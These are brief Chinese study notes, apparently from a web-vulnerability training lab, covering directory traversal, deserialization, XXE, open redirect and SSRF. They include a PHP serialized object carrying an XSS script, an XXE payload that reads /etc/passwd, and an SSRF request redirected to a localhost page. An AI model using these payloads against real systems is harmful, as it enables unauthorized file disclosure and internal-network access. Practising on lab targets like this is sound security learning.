目录遍历、敏感信息泄露、反序列化漏洞、XXE、URL重定向、SSRF
目录遍历
敏感信息泄露
检查页面源代码
# 反序列化
直接用概述里面的payload:O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
XXE
构造payload
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x>&f;</x>
URL重定向
修改url参数,直接访问其他地址
SSRF
其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据
SSRF (curl)
可通过伪造url,实现打开别的文件。
将url改成http://127.0.0.1/vul/ssrf/ssrf_info/info2.php
,跳转成功
SSRF (file_get_content)
file_get_content()函数的功能是对本地和远程的文件进行读取,放入一个字符串中。